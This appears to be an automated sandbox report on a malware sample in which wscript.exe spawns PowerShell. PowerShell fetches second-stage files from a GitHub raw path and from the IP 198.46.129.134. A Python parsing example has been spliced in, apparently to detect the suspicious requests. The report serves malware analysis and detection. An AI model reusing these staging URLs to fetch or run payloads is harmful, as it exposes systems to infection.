Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: 6?ll\System.pdb,4 source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aem.pdbdllj source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /450/LDBRR.txt HTTP/1.1 | Host: 198.46.129.134 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.129.134
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 02 Oct 2024 03:28:25 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 | Content-Length: 300 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 32 39 2e 31 33 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.129.134 Port 80</address></body></html>
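The two GET requests above carry only Host and Connection headers, the second one goes straight to a literal IP that was never resolved through DNS, and the server answers 404 (the staging file was already gone when the sample ran). The following is an added example, not Joe Sandbox code: it re-parses the report's flattened request/response lines (the cell boundaries are lost in extraction, so the header names themselves are used as split points, an assumption specific to this report format), flags the two conditions the report's signatures describe (no User-Agent, Host is a bare IP), and decodes the Data Raw hex dump to check it against Content-Length. The header list and the sample lines are constructed from this page.

```python
"""Re-parse a sandbox report's fused HTTP lines and apply two simple checks.

Added example; the input lines are copied from the report above, the set of
header names used as split points is an assumption about this report format.
"""
import ipaddress
import re

# Header names that appear in the report's fused lines. A zero-width lookahead
# on "Name: " recovers the boundaries the extraction dropped.
KNOWN_HEADERS = ["Host", "Connection", "User-Agent", "Date", "Server",
                 "Content-Length", "Content-Type", "Keep-Alive",
                 "Data Raw", "Data Ascii"]
_BOUNDARY = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in KNOWN_HEADERS))

# Constructed input: the request lines exactly as the report prints them.
REQUESTS = [
    "GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1"
    "Host: raw.githubusercontent.comConnection: Keep-Alive",
    "GET /450/LDBRR.txt HTTP/1.1Host: 198.46.129.134Connection: Keep-Alive",
]

# Constructed input: the 404 response line, including its Data Raw hex dump.
RESPONSE = (
    "HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 03:28:25 GMT"
    "Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300"
    "Keep-Alive: timeout=5, max=100Connection: Keep-Alive"
    "Content-Type: text/html; charset=iso-8859-1Data Raw: "
    "3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f "
    "49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a "
    "3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a "
    "3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a "
    "3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a "
    "3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a "
    "3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 "
    "20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a "
    "3c 68 72 3e 0a "
    "3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 "
    "20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 "
    "65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 32 39 2e 31 33 34 20 50 6f 72 74 20 38 30 "
    "3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a "
    'Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head>'
    "<title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "
    "was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 "
    "PHP/8.0.30 Server at 198.46.129.134 Port 80</address></body></html>"
)


def split_fused(line):
    """Return (start_line, {header: value}) for a line whose header boundaries were lost."""
    parts = _BOUNDARY.split(line)
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value
    return parts[0], headers


def parse_request(line):
    """Split a fused request line into method, path, version and headers."""
    start, headers = split_fused(line)
    method, path, version = start.split(" ", 2)
    return {"method": method, "path": path, "version": version, "headers": headers}


def analyze_request(line):
    """Return the findings the report's networking signatures are built on."""
    req = parse_request(line)
    findings = []
    if "User-Agent" not in req["headers"]:
        findings.append("no User-Agent header")
    host = req["headers"].get("Host", "").split(":")[0]  # drop an optional :port
    try:
        ipaddress.ip_address(host)
        findings.append("Host is a bare IP address: " + host)
    except ValueError:
        pass  # hostname, resolved via DNS
    return findings


def parse_response(line):
    """Split a fused response line and decode its Data Raw hex dump into the body."""
    start, headers = split_fused(line)
    status = int(start.split(" ", 2)[1])
    raw = bytes.fromhex(headers.get("Data Raw", "").strip())
    body = raw.decode("iso-8859-1")  # charset taken from Content-Type
    return {"status": status, "headers": headers, "raw": raw, "body": body}


if __name__ == "__main__":
    for line in REQUESTS:
        print(parse_request(line)["path"], analyze_request(line))
    resp = parse_response(RESPONSE)
    print(resp["status"], len(resp["raw"]), resp["headers"]["Content-Length"])
```

The Data Ascii column the report prints is the same body with newlines dropped, so the decode can be cross-checked against it; for a response that actually delivered a payload, the decoded bytes are what you would carve out and hash.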
Source: powershell.exe, 00000006.00000002.1348872454.00000177575DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://198.46.129.134
Source: powershell.exe, 00000006.00000002.1348872454.00000177575DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://198.46.129.134/450/LDBRR.txt
Source: powershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1348872454.0000017758890000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.1396024247.000001C822940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
